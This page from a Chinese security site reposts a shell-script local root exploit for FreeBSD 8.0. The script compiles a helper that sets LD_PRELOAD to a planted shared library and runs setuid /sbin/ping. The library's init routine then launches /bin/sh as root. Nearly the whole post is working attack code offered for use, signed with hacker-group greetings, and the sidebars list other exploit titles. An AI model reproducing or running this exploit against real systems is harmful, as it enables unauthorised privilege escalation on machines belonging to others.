首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
FreeBSD 8.0 Local Root Exploit
来源:Caddy-Dz[at]exploit-id.com 作者:Caddy-Dz 发布时间:2011-10-13  
#=====================================================================
#                      .__         .__  __            .__    .___
#  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
#_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ | 
#\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | 
# \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ | 
#     \/      \/|__|                                          \/  
#			Exploit-ID is the Exploit Information Disclosure
# 
#Web             : exploit-id.com	
#e-mail          : root[at]exploit-id[dot]com             
# 
#            #########################################			  
#		  	   I'm Caddy-Dz, member of Exploit-Id				
#		  	 #########################################			  
#======================================================================

####
# Exploit Title: FreeBSD 8.0 Local Root Exploit
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com  |  Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Category:: Local Exploits
# Tested on: 8.0-RELEASE
####

# Exploit

#!/bin/sh
echo ** FreeBSD local r00t Exploit
echo by Caddy-Dz
cat > env.c << _EOF
#include <stdio.h>

main() {
        extern char **environ;
        environ = (char**)malloc(8096);

        environ[0] = (char*)malloc(1024);
        environ[1] = (char*)malloc(1024);
        strcpy(environ[1], "LD_PRELOAD=/tmp/w00t.so.1.0");

        execl("/sbin/ping", "ping", 0);
}
_EOF
gcc env.c -o env
cat > program.c << _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
        extern char **environ;
        environ=NULL;
        system("echo ALEX-ALEX;/bin/sh");
}
_EOF
gcc -o program.o -c program.c -fPIC
gcc -shared -Wl,-soname,w00t.so.1 -o w00t.so.1.0 program.o -nostartfiles
cp w00t.so.1.0 /tmp/w00t.so.1.0
./env


# Peace From Algeria ...

#=================================**Algerians Hackers**=======================================|
# Greets To :                                                                                |
#  KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , yacine hebbal |
#  All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com)     |
#  All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , | 
#  RmZ ...others                                                                              |
#============================================================================================ |

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mozilla Firefox Array.reduceRi
·PcVue 10.0 SV.UIGrdCtrl.1 'Loa
·TugZip 3.5 Zip File Parsing Bu
·Mozilla Firefox Array.reduceRi
·Apache mod_proxy Proof Of Conc
·ACDSee FotoSlate PLP File id P
·MS11-064 TCP/IP Stack Denial o
·myBB 1.6.4 Backdoor Exploit
·BlueZone Desktop .zap file Loc
·Snortreport nmap.php and nbtsc
·WordPress 2.0.3 Denial of Serv
·Opera Browser 10/11/12 (SVG la
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved